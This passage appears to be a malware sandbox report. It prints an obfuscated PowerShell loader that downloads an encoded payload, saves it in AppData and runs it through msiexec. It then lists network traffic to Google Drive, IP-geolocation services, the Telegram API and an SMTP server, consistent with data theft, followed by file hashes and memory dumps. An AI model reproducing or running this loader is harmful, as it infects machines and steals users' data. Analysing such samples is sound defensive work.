KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? 
romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe 
erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. 
GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.187.206:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp
US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp
US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp
GB | 142.250.187.206:443 | drive.google.com | tcp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 142.250.187.227:80 | c.pki.goog | tcp
US | 8.8.8.8:53 | o.pki.goog | udp
GB | 142.250.187.227:80 | o.pki.goog | tcp
GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp
US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp
US | 8.8.8.8:53 | checkip.dyndns.org | udp
US | 193.122.130.0:80 | checkip.dyndns.org | tcp
US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 0.130.122.193.in-addr.arpa | udp
US | 8.8.8.8:53 | reallyfreegeoip.org | udp
US | 172.67.177.134:443 | reallyfreegeoip.org | tcp
US | 8.8.8.8:53 | api.telegram.org | udp
NL | 149.154.167.220:443 | api.telegram.org | tcp
US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp
US | 8.8.8.8:53 | mail.jacopopacchioni.com | udp
IT | 89.40.173.128:587 | mail.jacopopacchioni.com | tcp
US | 8.8.8.8:53 | 128.173.40.89.in-addr.arpa | udp
IT | 89.40.173.128:587 | mail.jacopopacchioni.com | tcp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp

Files

memory/3032-4-0x00007FF98A933000-0x00007FF98A935000-memory.dmp

memory/3032-10-0x00000216EE460000-0x00000216EE482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygkeupge.013.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3032-15-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-16-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-19-0x00007FF98A933000-0x00007FF98A935000-memory.dmp

memory/3032-20-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-21-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/3032-24-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

memory/1620-25-0x0000000002700000-0x0000000002736000-memory.dmp

memory/1620-26-0x00000000052D0000-0x00000000058F8000-memory.dmp

memory/1620-27-0x0000000005140000-0x0000000005162000-memory.dmp

memory/1620-28-0x00000000051E0000-0x0000000005246000-memory.dmp

memory/1620-29-0x0000000005900000-0x0000000005966000-memory.dmp

memory/1620-39-0x00000000059E0000-0x0000000005D34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2247453c28acd1eb75cfe181540458a8
SHA1 851fc5a9950d422d76163fdc6a453d6859d56660
SHA256 358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA512 42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

memory/1620-41-0x0000000006020000-0x000000000603E000-memory.dmp

memory/1620-42-0x0000000006050000-0x000000000609C000-memory.dmp

memory/1620-43-0x0000000007820000-0x0000000007E9A000-memory.dmp

memory/1620-44-0x00000000065A0000-0x00000000065BA000-memory.dmp

memory/1620-45-0x0000000007280000-0x0000000007316000-memory.dmp

memory/1620-46-0x0000000007220000-0x0000000007242000-memory.dmp

memory/1620-47-0x0000000008450000-0x00000000089F4000-memory.dmp

C:\Users\Admin\AppData\Roaming\precompelling.Wit

MD5 121104fabf2ff99a0b51a39ef26be7a0
SHA1 2bfe2c2ecb97fc48c7d0819cbbceccdb65e0acd7
SHA256 ca1195af4e1d3e7014c66dc288f54119cae1d3e69e10c8617ab69d7b9f2fab85
SHA512 c95db7463111bd67979c92f70ac94bc5441983c32cbbf959807edb6c2f9a94ee7bc3154e179b419d486e173428589e22123d78bc949a5e2f63077f54cf4b3b8e

memory/1620-49-0x0000000008A00000-0x000000000B256000-memory.dmp

memory/1936-62-0x0000000001040000-0x0000000002294000-memory.dmp

memory/1936-63-0x0000000001040000-0x000000000108A000-memory.dmp

memory/1936-64-0x0000000022C00000-0x0000000022C9C000-memory.dmp

memory/1936-66-0x00000000236C0000-0x0000000023882000-memory.dmp

memory/1936-67-0x0000000022FB0000-0x0000000023000000-memory.dmp

memory/1936-68-0x0000000023DC0000-0x00000000242EC000-memory.dmp

memory/1936-71-0x0000000023930000-0x00000000239C2000-memory.dmp

memory/1936-72-0x0000000020770000-0x000000002077A000-memory.dmp